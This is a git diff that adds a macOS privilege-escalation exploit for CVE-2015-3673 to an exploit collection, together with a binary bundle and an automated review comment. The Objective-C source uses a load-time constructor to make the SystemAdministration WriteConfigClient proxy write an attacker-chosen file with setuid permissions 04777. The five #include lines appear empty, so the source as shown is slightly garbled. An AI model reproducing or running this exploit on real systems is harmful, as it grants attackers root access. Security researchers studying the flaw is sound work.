diff --git a/data/exploits/CVE-2015-3673/exploit.daplug b/data/exploits/CVE-2015-3673/exploit.daplug
new file mode 100755
index 0000000000..35671a5136
Binary files /dev/null and b/data/exploits/CVE-2015-3673/exploit.daplug differ
diff --git a/data/exploits/CVE-2015-3673/exploit.m b/data/exploits/CVE-2015-3673/exploit.m
new file mode 100644
index 0000000000..dc450487ba
--- /dev/null
+++ b/data/exploits/CVE-2015-3673/exploit.m
@@ -0,0 +1,31 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include
+#include
+#include
+#include
+#include
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+ void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+ if (p != NULL)
+ {
+ id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+ objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+ id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+ NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+ NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+ NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+ objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+ data,
+ outpath,
+ @{ NSFilePosixPermissions : @04777 });
+ }
+}
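Review bot: The only header comment in exploit.m is the build command on its first line; nothing states what the constructor does or which issue it demonstrates, and the function name `test` says nothing either, so a reader has to reconstruct the intent from the selectors. A short header built from the lines already here would do, e.g. `// CVE-2015-3673: constructor runs at load time and asks the SystemAdministration WriteConfigClient remote proxy to write $PAYLOAD_IN to $PAYLOAD_OUT with mode 04777.` The five `#include` lines appear with no header name in this rendering, presumably an angle-bracket extraction artifact rather than the committed text; worth confirming against the original file. `FWK_BASE` is defined but never referenced in the hunk, so it can be dropped or its purpose noted.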